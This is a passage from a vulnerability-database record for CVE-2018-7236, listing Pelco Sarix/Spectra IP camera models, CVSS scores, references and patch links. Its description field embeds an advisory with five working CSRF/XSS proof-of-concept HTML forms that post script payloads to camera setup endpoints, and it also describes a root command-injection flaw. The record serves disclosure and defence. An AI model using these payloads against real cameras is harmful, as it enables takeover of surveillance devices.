"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric pelco sarix professional",
"scope": "lt",
"trust": 0.6,
"vendor": "schneider",
"version": "3.29.67"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:ibp1110-1er_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ibps110-1er_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imp1110-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imps110-1e_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7236",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2018-7236",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-05330",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7236",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7236",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7236",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7236",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-05330",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-053",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability exists in Schneider Electric\u0027s Pelco Sarix Professional in all firmware versions prior to 3.29.67 which could enable SSH service due to lack of authentication for /login/bin/set_param could enable SSH service. Schneider Electric Pelco Sarix Professional Contains an authentication vulnerability.Information may be obtained and information may be altered. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectricPelcoSarixProfessional is a video surveillance device from Schneider Electric, France. A security vulnerability exists in SchneiderElectricPelcoSarixProfessional with firmware prior to 3.29.67, which was caused by a program failing to authenticate to /login/bin/set_param. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_csrf.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7236",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2018-058-01",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-05330",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053",
"trust": 0.6
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143314",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070076",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"id": "VAR-201803-1843",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
}
]
},
"last_update_date": "2024-11-23T21:39:29.914000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2018-058-01",
"trust": 0.8,
"url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Id=9607912128\u0026p_File_Name=SEVD-2018-058-01+Pelco+Sarix+Professional+V1.2.pdf\u0026p_Doc_Ref=SEVD-2018-058-01"
},
{
"title": "SchneiderElectricPelcoSarixProfessional Unauthorized Patch for Operational Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/121577"
},
{
"title": "Schneider Electric Pelco Sarix Professional Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=78847"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2018-058-01/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7236"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7236"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.3,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42308/"
},
{
"trust": 0.1,
